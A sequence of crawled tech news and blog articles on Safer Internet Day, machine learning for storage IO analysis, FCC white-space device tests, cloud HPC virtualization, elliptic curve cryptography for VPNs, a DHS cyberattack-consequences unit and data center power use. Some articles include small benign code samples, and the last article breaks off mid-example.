Yesterday, the 11th of February 2014, was the eleventh annual 'Safer Internet Day', a time when the general public, and particularly those who care for children and other vulnerable people, can learn how to stay safe online. What is Safer Internet Day? Coordinated by Childnet International, the South West Grid for Learning, and the Internet Watch Foundation, the initiative aims to educate people who may not be aware of the ways in which their details are being shared and the common pitfalls encountered online. Peter Wanless, CEO of the NSPCC, explains further: "Making the internet safer for children and young people is the child protection challenge of this generation. And Safer Internet Day is a chance for everyone – industry, Government, charities, schools, and families – to talk about online safety and share knowledge about what works. A safer internet is built not only by technical endeavour and policies, but by the behaviour of the people that use it. We all need to encourage young people to seek help when they are upset by something or someone online. And service providers and website owners must continue to make it easier for young people to report upsetting content and behaviour, and take swift action to tackle it." What are the challenges? One of the main challenges faced by companies working in online security is a lack of knowledge on the side of day to day users. The internet is a dynamic area which changes every day – social networking sites update their privacy policies, websites claiming to be reputable are set up for the purpose of defrauding naïve users – and keeping up with all the changes is a full-time job in itself. Of course, one of the most sensitive yet important areas of discussion is how to keep children safe online in a realistic way. According to a recent study released by the Internet Watch Foundation, only 37% of parents have had conversations with their children about what to do if something upsets them online, and just 20% have told their children how to report behaviour that makes them uncomfortable. This lack of preemptive action can lead to young people being confused when difficult situations arise – often when a child is being bullied, or when someone is making advances that make them feel uncomfortable, they do not want to discuss the details with their parents or carers. This leads to some people attempting to restrict young people's internet access, but with the proliferation of multi-device usage and computers in schools, it is difficult to make this a realistic solution. Giving a young person a level of control over their own internet usage whilst providing them with a space where they can report unwanted behaviour of any kind goes some way towards solving this problem – so why are so few parents investing time in educating their children about internet safety? A common response to this question is simply that 'the internet' is too large a subject to broach. Websites change and update daily, children often keep their blogs and profiles hidden from their parents, and the latest trends in online life can seem incomprehensible to people who use the internet solely for work, a few personal emails and perhaps some online shopping. It is unrealistic to expect carers to spend as much time online as the children in their care, and yet this is really the only way to properly understand the social landscape navigated by young people every day. And even when incidents are reported, investigating them can be a challenge.
With internet cafés, libraries and cheap handheld devices widely accessible, proving that a specific person perpetrated a crime – or even a series of crimes – is not as simple as gaining access to their personal computer and analysing its contents. Common public misconceptions such as the CSI effect can give rise to frustration on the part of those who report internet safety breaches: members of the general public often find it difficult to understand why law enforcement agents and digital forensics professionals cannot “just hack in and find out”, leaving victims with a sense of despair at not being taken seriously. Yet education about the methodologies used and time required in solving cases of internet safety breaches is not something that can be easily delivered to people with little or no prior training in computer science or digital forensics, particularly when fictional depictions of the field are so far-fetched. Reports of child protection cases in the news media do not generally demonstrate the scale of manpower, time and resource that is required to bring perpetrators to justice, instead focusing solely on results and allowing the public eye to skim over the more complex details. And yet if we want to ensure that young people are safe online, they surely need some level of understanding of both how and where to report unwanted behaviour, and the process that is set in motion once a report has been made. Finding a realistic solution Safer Internet Day aims to address these concerns without placing unrealistic expectations on people who are responsible for children. Rather than being asked to inform young people about the specific dangers of each type of site, or the ways in which they might be exploited online – elements which change every day – the Centre encourages parents and carers to provide children with the skills they need to be able to navigate the web securely, and to deal with any potential danger in a productive manner. Will Gardner, the Safer Internet Centre’s Director, explains: “Everyone has responsibility to make internet safety a priority. Young people are increasingly becoming digital creators and we must equip them with the skills to continue to create and innovate by working together to make the internet a great and safe place. This Safer Internet Day is the biggest one yet – the fantastic range of supporters really reflects how widespread and important this issue is, and we are delighted to see such collaborations where schools, civil society, public and private sectors are all championing the same cause.” And what about educating young people in how investigations are conducted, or about what happens when they submit a report to a law enforcement agency or similar body? There is a certain level of knowledge which can only be gained from training in digital forensics, however the basic concerns of young people can be addressed by giving them at least a rough understanding of how professionals deal with such reports. With this in mind, the three bodies who make up the UK Safer Internet Centre have put together a series of online and offline resources around internet safety. On average, two schools are visited by the team per working day, where talks focus not only on how to report incidents, but also what happens once a report has been made. Follow-up advice is given through the Safer Internet Centre’s website, where a series of helplines provide in-depth, personalised information on subjects ranging from indecent images of children to cyberbullying and scams. 
Over the past twelve months, 3,846 schools have been reached, over 39,000 reports of indecent content featuring children have been reported to the Safer Internet Centre by members of the public, and 9,550 websites featuring such content have been removed. Whilst progress is not always as fast as people would like, it is at least being made. Everyone, from digital forensics professionals to people who care for children but are not computer literate themselves, can make a difference to the ways in which we deal with online behaviour. In the words of this year’s Safer Internet Day theme, ‘Let’s create a better internet together’.
<urn:uuid:46c7db04-0d55-4865-99f6-3528b84748e7>
CC-MAIN-2017-09
https://articles.forensicfocus.com/2014/02/12/safer-internet-day/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.84/warc/CC-MAIN-20170219104611-00200-ip-10-171-10-108.ec2.internal.warc.gz
en
0.959011
1,505
3.171875
3
Artificial Intelligence and Data Storage
"My God. It's Full of Data" - Bowman (My apologies to 2001: A Space Odyssey)
Just in case you weren't sure, there is a huge revolution happening. The revolution is around using data. Rather than developers writing explicit code to perform some computation, machine learning applications, including supervised learning, reinforcement learning and statistical classification applications, can use the data to create models. Within these categories there are a number of approaches, including deep learning, artificial neural networks, support vector machines, cluster analysis, Bayesian networks and learning classifier systems. These tools create a higher level of abstraction of the data, which, in effect, is learning, as defined by Tom Mitchell (taken from Wikipedia): "A computer program is said to learn from experience E with respect to some class of tasks T and performance measure P if its performance at tasks in T, as measured by P, improves with experience E." After learning, these tools can make predictions based on new input data. Rather than create code with sets of rules and conditions to model a problem or a situation, these algorithms utilize only the data to form their own rules and models. There are other algorithms within data analysis that focus on the data with the goal of discovering patterns or models that can explain or inform, as well as predict. There are also areas, such as descriptive statistics, that can create useful information about data. There have been lots of articles written about data analysis, machine learning, deep learning, exploratory data analysis, confirmatory data analysis, big data and other related areas. Generally, the perception is that these tools are used for problems that involve commerce or games with some early scientific applications. However, the truth is that they can be applied to virtually any problem that has data associated with it. Utilizing this data, we can create models and patterns for the purpose of learning more about the overall problem. In this article, I want to discuss a few ideas for using these techniques in the realm of storage.
Learning IO Patterns
Understanding or quantifying the IO pattern of applications has long been a tedious and often extremely difficult task. However, with an understanding of the IO pattern, you can tailor the storage solution to the application. This could mean improved performance to match the needs of the application, or a more cost-effective storage solution. You can also figure out the IO pattern and then modify the code to improve the IO pattern of the application (however you want to define "improve"). When I'm trying to understand the IO pattern of an application or a workflow, one technique that I use is to capture the strace of the application, focusing on IO functions. For one recent application I examined, the strace output had more than 9,000,000 lines, of which a bit more than 8,000,000 lines were involved in IO. Trying to extract an IO pattern from more than 8,000,000 lines is a bit difficult. Moreover, if the application is run with a different data set or a different set of options, new IO patterns may emerge. Data analysis tools, particularly machine learning, could perhaps find IO patterns and correlations that we can't find. They might also be able to predict what the IO pattern will be based on the input data set and the application runtime options.
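Before any learning step, a multi-million-line trace like that usually has to be condensed into a handful of numbers. The script below is a rough sketch of that first pass, my own illustration rather than anything from the tools above: it assumes the trace was collected with something like `strace -f -T -o app.trace ./app`, and its regular expression only covers the common read/write forms.

```python
import re
import sys
from collections import Counter

# Matches strace lines such as:
#   read(3, "..."..., 65536) = 4096 <0.000041>
#   [pid 1234] write(4, "..."..., 8192) = 8192 <0.000105>
call_re = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?(read|write)\(\d+,.*\)\s*=\s*(-?\d+)\s*<([\d.]+)>'
)

counts = Counter()       # number of calls per syscall
bytes_moved = Counter()  # bytes actually transferred per syscall
time_spent = Counter()   # seconds spent inside each syscall

with open(sys.argv[1]) as trace:
    for line in trace:
        m = call_re.match(line)
        if not m:
            continue
        syscall, ret, elapsed = m.group(1), int(m.group(2)), float(m.group(3))
        counts[syscall] += 1
        if ret > 0:
            bytes_moved[syscall] += ret
        time_spent[syscall] += elapsed

for syscall in counts:
    avg = bytes_moved[syscall] / counts[syscall]
    print(f"{syscall}: {counts[syscall]} calls, {bytes_moved[syscall]} bytes "
          f"(avg {avg:.0f} B/call), {time_spent[syscall]:.2f} s in syscalls")
```

The per-syscall counts, byte totals, and in-syscall times it prints are exactly the kind of compact features the learning tools described above could then consume.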
There are many possible tools that could be applied to finding IO patterns, but before diving deep into them, we should define what the results of the analysis are to be. Do we want to create a neural network that mimics the IO behavior of the application over a range of data sets and input options? Or do we want to concisely summarize the IO patterns with a few numbers? Or perhaps do we want to classify the IO patterns for various data sets and application options? The answers to these and other questions help frame what type of data analysis needs to be done and what kind of input is needed. One important thing to note is that it is unlikely that learning or characterizing IO patterns would be done in real time. The simple reason is that to best characterize the pattern, one would need the complete time history of the application. Thus, it can't be done in real time. However, capturing the IO time history of an application is the key to learning and characterizing the IO pattern. Learning about or characterizing the IO patterns, while extremely important, is not enough. The characteristics of the storage itself, both hardware and software, must be determined as well. Knowing the likely IO pattern of an application would then allow either the IO performance to be estimated for a given storage solution or allow a buyer to choose the best storage solution. Imagine a simple scenario: We have an application with a known IO pattern for the given input data set and the options used to run the application. From the IO characterization, we also know that the IO is estimated to take 10 percent of the total time for one storage system or 15 percent with an alternative storage system. This is data analysis for storage! At this point we have a choice. We could run the application/data set combination on the first storage system with one estimated total run time and a given cost. Or we could run it on the second one, which is slower, causing the run time to increase, but perhaps with a lower cost. What is really cool is that the data analysis of the IO patterns, our use of artificial intelligence, has allowed this decision to be made with meaningful estimates. No longer do we have to guess or use our gut feeling or intuition as we do today. We use real, hard data to create models or learn about the IO pattern and create information or knowledge that is actionable.
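To make the classification idea concrete, here is a small illustrative sketch (mine, not the author's) that clusters per-run IO summaries of the kind the strace script shown earlier produces, using k-means from scikit-learn. The three features and the choice of three clusters are assumptions invented for the example.

```python
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans

# One row per application run: [read fraction of IO bytes,
#                               average request size in KiB,
#                               fraction of runtime spent in IO]
runs = np.array([
    [0.95, 1024.0, 0.10],   # large sequential reads
    [0.90,  512.0, 0.12],
    [0.15,    4.0, 0.35],   # small writes, IO-heavy
    [0.20,    8.0, 0.30],
    [0.55,   64.0, 0.05],   # mixed, IO-light
    [0.50,  128.0, 0.04],
])

# Scale features so request size does not dominate the distance metric.
scaler = StandardScaler().fit(runs)
features = scaler.transform(runs)

kmeans = KMeans(n_clusters=3, n_init=10, random_state=0).fit(features)
print("cluster labels per run:", kmeans.labels_)

# A new run can then be assigned to the nearest existing IO-pattern class.
new_run = scaler.transform([[0.92, 768.0, 0.11]])
print("predicted cluster for new run:", kmeans.predict(new_run))
```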
<urn:uuid:db294a30-0e0a-415f-b61e-bbf8e08e798f>
CC-MAIN-2017-09
http://www.enterprisestorageforum.com/storage-management/ai-and-storage-1.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00552-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947859
1,157
2.78125
3
The FCC's Office of Engineering and Technology issued a report late yesterday that gave negative marks to current attempts at building a personal "white space" receiver and transmitter. Such a device could open up the empty spaces in the television spectrum for unlicensed wireless broadband, unleashing a surge of creativity and innovation that could make WiFi look as attractive as a 900MHz cordless phone. That is, so long as such a device actually works. On the day that the switch over to digital television broadcasts is finalized in early 2009, companies could be free to sell unlicensed devices that can send and receive information in whatever parts of the television spectrum are unused in a given location (well, except for channels 37 and 52-69), so long as they meet FCC engineering criteria. Because the low frequencies used by over-the-air television signals are able to cover great distances and penetrate walls with ease, they theoretically provide a perfect place to deploy wireless broadband technologies over great distances—without having to purchase a chunk of licensed spectrum at auction. The FCC is considering two sorts of these white space devices. The first is mounted in a fixed location, operates at relatively high power, and is installed by professionals. It should be easy enough to set up such a device without interfering with nearby TV signals, as the installers will simply guarantee that no channel is broadcasting in that area. This version has already been approved by the FCC. But the other kind of device is trickier to implement. This is a portable/personal white space device which would be deployed at homes and businesses, much like WiFi routers are today. Because of this mass rollout, industry would like to create a device that does not need professional installation. But how to make sure that such a device could work anywhere in the US? The solution that industry groups have come up with is to use spectrum sensing technology and to employ a "listen before talk" transmission system. The white space device would be responsible for determining which frequencies are free in any given location and using only those frequencies without interfering with others. Yesterday's FCC engineering report took a look at two prototype devices submitted by an unnamed industry group (though we already know that they were submitted by the White Spaces Coalition). The conclusion was not pretty: spectrum sensing can be quite spotty, and interference with TV signals is a real issue. But the second device submitted was a marked improvement on the first.
The tests, and the spin
"Device A" failed its tests miserably, both in the lab and in the field. Engineers took the device to several area houses where DTV signals were already being received by over-the-air antennas. They wanted to see if the device would properly detect the presence of those signals. Alas, "where a DTV signal was strong enough to be received on the TV, the scanner reported its channel to be free or available 40 percent to 75 percent of the time." This means, as the FCC drily puts it, the device "did not provide consistently accurate determinations." Indeed.
[Figure: "Device A" transmitter testing]
But "Device B" was a major improvement. It had no transmitter (only A had one), and the Coalition specifically told the agency that it was not ready for field testing.
But in bench testing, it fared far better than A did and was "generally able to reliably detect DTV signals at -115 dBm in the single channel tests and at -114 dBm in the two-channel tests." It also took only eight seconds to scan each channel, down from a whopping 27 seconds in the first device.
[Figure: "Device B" spectrum sensing tests]
Still, the FCC concluded that the devices "do not consistently sense or detect TV broadcast or wireless microphone signals," but they noted that these were preliminary units. The White Spaces Coalition, in a statement released today, seized on the performance of Device B. "Coalition members are encouraged that FCC engineers did not find fault with our operating parameters and remain confident that unlicensed television spectrum can be used without interference," said the group. "We will work with the Federal Communications Commission to resolve any open questions quickly enabling the FCC to meet its October deadline and delivering on the common goal of driving innovation and expanding Internet access for all Americans." The National Association of Broadcasters, which has been opposed to the devices over concerns about interference, had a different take. Its statement, also released this morning, said that the report "revealed that portable, unlicensed devices cause interference to television broadcast signals, an assertion television broadcasters, sports leagues, wireless microphone manufacturers, and others have long made."
<urn:uuid:30ab6289-c498-4f71-9ab6-15d9b4ecdf3a>
CC-MAIN-2017-09
https://arstechnica.com/uncategorized/2007/08/white-space-devices-get-black-marks-from-fcc/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00076-ip-10-171-10-108.ec2.internal.warc.gz
en
0.975463
930
2.703125
3
When considering moving excess or experimental HPC applications to a cloud environment, there will always be obstacles. Were that not the case, the cost effectiveness of cloud-based HPC would rule the high performance landscape. Jonathan Stuart Ward and Adam Barker of the University of St. Andrews produced an intriguing report on the state of cloud computing, paying a significant amount of attention to the problems facing cloud computing. The researchers split the problems into two broad categories: technological and legal. The second has added gravity today in light of recent leaks on the data mining activities of the United States National Security Agency, although those specific circumstances will not be discussed here. However, according to the report, an incident in 2010 (Wikileaks) laid the foundation for an environment where such infringement could happen. However, the technological concerns are more relevant to those seeking to outsource HPC applications to the cloud. Virtualization, according to the report, is a key to running high performance applications in a cloud setting. That should be neither surprising nor interesting, as cloud computing is sometimes referred to as 'computing in a virtualized environment.' However, it is an important distinction to consider. As the report noted, "virtualizing a computer system reduces its management overhead and allows it to be moved between physical hosts and to be quickly instantiated or terminated." As computations in a public cloud must be somehow sent back to the host and it is preferable that such sending happens quickly, virtualization is understandably important. The preferred infrastructure to virtualize into a cloud environment would be that of the Intel x86, used in many localized HPC instances. That affinity presents problems for cloud computing. "The x86 architecture was not conceived as a platform for virtualization. The mechanisms which allow x86 based virtualization either require a heavily modified guest OS or utilise an additional instruction set provided by modern CPUs which handles the intercepting and redirecting traps and interrupts at the hardware level." It is of course possible to virtualize such an architecture, but it will result in what the researchers call a performance penalty. That penalty has been significantly reduced over the last few years, but is still present and can manifest itself in I/O performance, sometimes in extreme ways. "IO performance in certain scenarios," the researchers note, "suffers an 88% slowdown compared to the equivalent physical machine." One of the main principles behind computing in the cloud is the optimization of resources. Virtualized machines (or Virtual Machines, or VMs) curtail performance to ensure the servers are in use, which is not necessarily ideal. A further issue raised by Ward and Barker is the interoperability among major cloud service providers like Amazon, Google, Rackspace, and Microsoft. They related it to mainframe computing, which was dominated by IBM in the 1970s. "Increased interoperability is essential in order to avoid the market shakeout the mainframe industry encountered in the 1970s. This is a significant concern for the future of cloud computing." Scaling up is another issue presented by the researchers, but one they feel is at least somewhat adequately addressed by the development of NoSQL. "It is NoSQL which has been a driving force behind cloud computing.
The unstructured and highly scalable properties of many common NoSQL databases allows for large volumes of users to make use of single database installation to store many different types of information.” It is this notion that carries the storage capacity for HPC applications in things like Azure and S3. Of course, it is difficult to discuss the complications of computing in the cloud without addressing security and what the report refers to as trust issues. The report, which was coincidentally published last week, seems prescient considering the NSA PRISM leaks that have been brought to light over the last week or so. The researchers here delved into how the Wikileaks incident in 2010 laid the groundwork. “Without a comprehensive legal framework in place it is impossible to conclusively argue what parties cannot access or otherwise interfere with cloud based operations. This issue is problematic for organisations such as Wikileaks which are not well received by world governments. Unfavorable organisations can be effectively barred from operating on the cloud by any organisations able to exert influence against the provider.” Determining jurisdiction in these circumstances is hazy. The Amazon datacenter in question over the Wikileaks scandal was based in Europe. However, Amazon is based in the United States, potentially subjecting it to US government pressure if necessary. “Worse still is the possibility that governments can compel cloud providers to provide access to client’s services or data,” the researchers argued. “This is a major problem for cloud computing and if this issue remains unanswered, [one] could potentially see cloud providers relinquishing user and company data to world governments based on a legal mandate.” The security issue is not a new one. Companies with sensitive data take measures to ensure the security of their cloud-housed data, such as adding additional vendor-supplied security layers or participating in a sort of ‘virtual private cloud.’ In this case, it seems unlikely that the NSA would mine experimental financial data to find terrorism patterns. However, as the report noted, a potentially dangerous precedent could be set by these actions. Will this break the trust of companies looking to keep their potentially critical and sensitive data in a cloud service? It is unclear, but this report at least indicates that could happen. From I/O bottleneck issues to scalability to security and trust issues, the complications of cloud HPC are significant. However things like NoSQL (for scale) and better virtualization tools and workload managers are being built to mitigate those issues.
<urn:uuid:a4eac03e-914e-4c7f-bf4f-900c43cf1a95>
CC-MAIN-2017-09
https://www.hpcwire.com/2013/06/13/examining_questions_of_virtualization_and_security_in_the_cloud/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00076-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95623
1,207
2.71875
3
Recently, there have been many advances in cracking encryption algorithms that are the basis for the most common cryptography systems, such as Diffie-Hellman, RSA and DSA. Experts warn that within the next several years, the RSA public key cryptography system could even potentially become obsolete. If that is the case, how will enterprises be able to ensure secure remote access in the near-future? First, let’s take a look at the problem itself. Encryption algorithms ensure security by utilizing the assumption that certain mathematical operations are exponentially difficult, such as the problems of integer factorization and the discrete logarithm, to prevent the decryption of public and private keys. As the key length increases, it becomes exponentially harder to decrypt, which is why key sizes are typically 128 bits and above. After more than 30 years of little progress, researchers have recently started creating faster algorithms for limited versions of the discrete logarithm problem, which has rung the alarm for the entire cryptographic community. It has made us realize that we need to implement a more secure standard, Elliptic Curve Cryptography (ECC). ECC is the best option moving forward for secure remote access via VPNs, because it is based on an operation that not only is difficult to solve but also is a very different problem from the discrete logarithm and integer factorization. Due to its unique characteristics, it is not impacted by advances in decrypting cryptography systems that utilize either of those problems. Currently, ECC is still not widely in use, but that is starting to change. It is particularly important for enterprises to implement ECC over the next several years to improve network security, because if decryption advances proceed at the current rate, TLS, a common protocol that ensures secure communications over the Internet, will be vulnerable to hackers until TLS 1.2, which includes ECC support, becomes widely available. If TLS communications can be decrypted, hackers could steal sensitive data, such as corporate financial information and documents, or even gain complete access to a corporate network to bring it down from the inside. Implementing ECC right now will ensure that the worst case scenario will not happen. It’s time for enterprises to stay ahead of the curve, and use ECC to protect remote access to their corporate networks. This post originally appeared on VPNHaus.com.
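As a rough illustration of what adopting ECC looks like in code, the sketch below generates an elliptic curve key pair alongside an RSA one and performs an ephemeral ECDH exchange. It uses the open-source Python cryptography package rather than any particular VPN product, and the curve (P-256) and RSA size (3072 bits) are common illustrative choices, not recommendations from the original post.

```python
from cryptography.hazmat.primitives.asymmetric import ec, rsa
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

# A 256-bit elliptic curve key is commonly treated as comparable in strength
# to a roughly 3072-bit RSA key, while being far smaller and faster to generate.
ec_private = ec.generate_private_key(ec.SECP256R1())
rsa_private = rsa.generate_private_key(public_exponent=65537, key_size=3072)

# Ephemeral ECDH: each side contributes a key pair and derives the same secret.
peer_private = ec.generate_private_key(ec.SECP256R1())
shared_secret = ec_private.exchange(ec.ECDH(), peer_private.public_key())

# Derive a symmetric session key from the raw shared secret.
session_key = HKDF(
    algorithm=hashes.SHA256(),
    length=32,
    salt=None,
    info=b"vpn session key",  # hypothetical context label for the example
).derive(shared_secret)

print("EC key size:", ec_private.key_size, "bits")
print("RSA key size:", rsa_private.key_size, "bits")
print("derived session key length:", len(session_key), "bytes")
```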
<urn:uuid:93b33280-0c38-441f-8f3b-520f10427bb2>
CC-MAIN-2017-09
http://infosecisland.com/blogview/23360-Why-Elliptic-Curve-Cryptography-is-Necessary-for-Secure-Remote-Access.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00248-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950574
482
3.125
3
What happens when the Net is attacked? That's the question an obscure Homeland Security project is attempting to answer. So far, so good.
By William Jackson - Jul 20, 2006
When a building collapses, you can see the devastation. When a network is brought to its knees, the effects are less obvious. That's why a little-known research institute funded by the Homeland Security Department is working to bring some order to the study of cyberattacks. Despite annual reports from the FBI and repeated consultant studies, surprisingly little is known about the real costs of malicious code, denial-of-service and other attacks, because the companies that own the infrastructure are reluctant to share the information. 'Historically, the threat of cyberattacks has not received as much attention as the physical threat posed by terrorism and natural disasters,' said Andy Purdy, acting director of the DHS National Cyber Security Division. As a result, estimates of financial impact have been based on guesses, said Scott Borg, director and chief economist for the U.S. Cyber Consequences Unit. There has been little solid data to analyze, and no tested methodologies to analyze it. We don't even know what threats we should be protecting ourselves against. 'So much of what we have been hearing about cyberattacks was just hearsay,' Borg said. 'We found out a lot of things people were worried about were extremely unlikely.' US-CCU was established in 2004 with a shoestring, four-month budget of $200,000 to do surveys of the electrical-power and health care sectors. Other industry sectors providing critical infrastructure were to be added later. 'We were very naive,' Borg said. 'The research project proved larger and more difficult than anticipated.' The original contract was stretched out to cover a year, and now, well into its second one-year contract, US-CCU is still in what Borg calls a 'rather extended start-up phase.'
We have time
Fortunately, doomsday scenarios such as shutting down the power grid or the Internet are not likely to occur soon. 'These are not impossible, but they are way harder to do than a lot of people anticipated,' Borg said. 'Al-Qaida is not going to shut down the Internet or the power grid. So we have time.' To use that time wisely, US-CCU recently released a security checklist to help enterprises focus on real-world consequences of cyberattacks. Borg and research director John Bumgarner based the 478 checklist items on their on-site visits. 'We started seeing huge vulnerabilities during our visits,' Borg said. Most of the systems they evaluated were compliant with current security checklists and industry best practices. 'And portions of those systems were extraordinarily secure. But they were Maginot lines,' susceptible to being outflanked. The problem was that existing best practices were static lists based on outdated data. The US-CCU list shifts the focus from perimeter security to monitoring and maintaining internal systems. The problem with perimeter security is that there is always some way to circumvent it. 'We are way into diminishing returns on our investments in perimeter defense,' Borg said.
'To deal with it now, you have to think of the problem of cybersecurity not from a technical standpoint, but by focusing on what the systems do, what you could do with them and what the consequences [would] be.'

Unfortunately, the tools for analyzing consequences have been lacking. The biggest roadblock has been the unwillingness of companies to share data, either with other companies or with the government.

'Without a comprehensive understanding of the potential economic impacts from cyberattacks, it is difficult to make an informed decision regarding investment in and prioritization of countermeasures,' Purdy said.

It was Purdy's predecessor in the Cyber Security Division of DHS, Amit Yoran, who authorized formation of US-CCU in April 2004. But the initial impetus came from the department's Private Sector Office, which was concerned about the lack of credible information about the costs of cyberattacks.

Borg, a senior research fellow at Dartmouth College's Tuck School of Business, had given briefings to government agencies and corporations on his models for economic analysis. He also had been chief economist on the Livewire cyberattack exercise in 2003 and served in the same capacity in this year's DHS Cyber Storm exercise. He was tapped to lead the effort.

Borg advocates applying real-world economics rather than quick-and-dirty estimates to the cost of cyberattacks. 'The cost of cyberattacks can be assessed by looking at how they change the overall inputs and outputs of business,' Borg wrote in his funding proposal to DHS. This is obvious, but previous attempts have simply added up the cost of lost capacity attributed to attacks, without taking into account how much capacity is normally used or how much value it creates. Disruptions in critical infrastructure are often mitigated by work-arounds or by postponing an activity, and value is not completely lost.

Initial studies by US-CCU have produced some surprises. In an era of just-in-time inventory and high-speed delivery, shutting down a company or a portion of the infrastructure is normally seen as the greatest threat to productivity. 'But shutting things down for up to three days just doesn't cost much,' Borg said. Systems have enough excess capacity and inventory to survive short shutdowns well.

On the other hand, poorly secured process control systems, which form a nexus of the nation's physical and IT infrastructures, appear to be a greater danger than anticipated. These supervisory control and data acquisition (SCADA) systems have long been a security concern.

Cybersurprise

'I had already been paying attention to SCADA systems,' Borg said. 'But I was surprised by the degree of interconnections with the Internet.'

'Most of this stuff has not been a big surprise to the relevant business people,' he said. The problem has been the lack of communication among business people and between business and government, because much of this information is proprietary. It was this wariness that required US-CCU to be set up as an independent institute, working at arm's length from DHS and able to protect corporate data from government.

Funds for US-CCU have been funneled through a General Services Administration contract with Sonalysts Inc. of Waterford, Conn., an e-business consulting group that is the legal and financial administrator for the unit. US-CCU has been able to survive on its shoestring budget because the 10-person staff uses its own day-job offices, and much of their work is donated, Borg said.
His next goal at US-CCU is to develop more industry-specific security tools, because one size does not fit all in IT security. 'No wonder we have vulnerabilities,' he said. 'This is a huge opportunity for both security vendors and the hacker community.'

But instability within the DHS Cyber Security Division has hampered the unit's ability to gain either funding or attention, Borg said. Yoran resigned in September 2004, and Purdy remains in an acting capacity nearly two years later. A newly created slot for assistant secretary of cyber-security is unfilled, and personnel changes have limited institutional memory.

The draft of the US-CCU cyber-security checklist was released in April without the DHS name or seal and has yet to be vetted by the department. 'I have tried hard to keep the National Cyber Security Division informed about the CCU's work and sought guidance on the release of the checklist,' Borg said. He tried to set up a meeting to discuss the checklist, but 'the relevant people seemed to have trouble fitting me into their schedules.'

Still, Purdy said that 'understanding the consequences of cyberattacks is particularly important in assessing the risk to a critical infrastructure,' and this requires a 'quantitative, systematic and rigorous process,' which US-CCU is striving to provide. Let's hope it's given the chance to succeed.
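To make Borg's input/output argument concrete, here is a minimal sketch with purely hypothetical numbers; it simply contrasts a naive "lost capacity" estimate with one that credits work-arounds and postponed activity, and is not taken from any US-CCU methodology.

```python
# Minimal sketch (hypothetical numbers) contrasting a naive "lost capacity"
# estimate with one that credits work-arounds and postponed activity,
# in the spirit of the input/output approach described above.

def naive_loss(daily_revenue, outage_days):
    # Assumes every day of downtime is pure, unrecoverable loss.
    return daily_revenue * outage_days

def adjusted_loss(daily_revenue, outage_days, utilization=0.7,
                  recoverable_share=0.8):
    # Only the capacity actually in use can be lost, and much of that work
    # is postponed or handled by work-arounds rather than lost outright.
    value_at_risk = daily_revenue * outage_days * utilization
    return value_at_risk * (1.0 - recoverable_share)

if __name__ == "__main__":
    revenue, days = 1_000_000, 3  # hypothetical firm, three-day outage
    print(f"Naive estimate:    ${naive_loss(revenue, days):,.0f}")
    print(f"Adjusted estimate: ${adjusted_loss(revenue, days):,.0f}")
```

With these illustrative inputs the adjusted figure comes out at a small fraction of the naive one, which is the intuition behind the observation that short shutdowns "just don't cost much."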
<urn:uuid:961cfcbb-7b5e-4c3c-9818-8d627983fba2>
CC-MAIN-2017-09
https://gcn.com/articles/2006/07/20/what-happens-when-the-net-is-attacked.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00248-ip-10-171-10-108.ec2.internal.warc.gz
en
0.968168
1,687
2.59375
3
Data Center Power Consumption on the Rise, Report Shows

By Scott Ferguson | Posted 02-15-2007

The amount of electricity used to power the world's data center servers doubled in a five-year span due mainly to an increase in demand for Internet services, such as music and video downloads, and telephony, according to a new report.

If current trends continue, the amount of power to run the world's data center servers could increase by an additional 40 percent by 2010, said Jonathan Koomey, a staff scientist at Lawrence Berkeley National Laboratory in Berkeley, Calif., and a consulting professor at Stanford University. Koomey's report, funded by Advanced Micro Devices, the Sunnyvale, Calif., chip maker, is being presented at the LinuxWorld OpenSolutions Summit in New York City on Feb. 15.

Between 2000 and 2005, according to Koomey's research, the average amount of power used to fuel servers within the data center doubled. In the United States, that represented a 14 percent annual growth in electrical use, while worldwide use increased by about 16 percent every year. In 2005, the electrical bills for U.S. companies totaled $2.7 billion. The cost of electricity for the entire world topped $7 billion.

Within the United States, the total cost of powering data center servers represented about 0.6 percent of total electrical use within the country. When the additional costs of cooling and other usage are factored in, that number jumps to 1.2 percent.

"The total power demand in 2005 (including associated infrastructure) is equivalent (in capacity terms) to about five, 1000 MW [megawatt] power plants for the U.S. and 14 such plants for the world," Koomey wrote in the report.

The study, using data from IDC, looked specifically at servers used in the world's data centers, which represent about 60 to 80 percent of a data center's total IT loads. As the demand for new technology grew, the number of installed, low-end volume servers (typically systems under $25,000, a category that also includes blades) increased. This trend seems to have driven the skyrocketing energy consumption of the last five years more than the actual energy usage per server.

"Almost all of this growth is attributable to growth in the numbers of servers (particularly volume servers), with only a small percentage associated with increases in the power use per unit," according to the report.

In the report, Koomey acknowledges that further study of data center equipment, such as data storage and networking equipment, is needed to gain a more insightful and complete view of the average cost of powering a data center.

Koomey concludes that a number of factors could change power consumption in the next several years, including the adoption of more blades in the data center, virtualization technology, and more awareness of the total cost of ownership of data center equipment.

"The total cost of building a large data center is now on the order of $100 to $200 [million], which is sufficient to get the attention of the CEO of most large organizations," Koomey writes. "That visibility to corporate management is likely to drive operational and design improvements that should over time improve the Site Infrastructure Energy Efficiency Ratio and spur the adoption of energy metrics and purchasing standards for efficiency of IT equipment within these companies."

Check out eWEEK.com for the latest news, views and analysis on servers, switches and networking protocols for the enterprise and small businesses.
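As a rough illustration of how the pieces of such an estimate fit together, the back-of-the-envelope sketch below shows how a server count, per-server draw, infrastructure overhead and an electricity price roll up into an annual bill. All inputs are hypothetical placeholders, not figures from Koomey's report.

```python
# Back-of-the-envelope sketch (hypothetical inputs) of how server counts,
# per-server draw, cooling/infrastructure overhead and electricity price
# combine into an annual power bill of the kind discussed in the report.

HOURS_PER_YEAR = 8760

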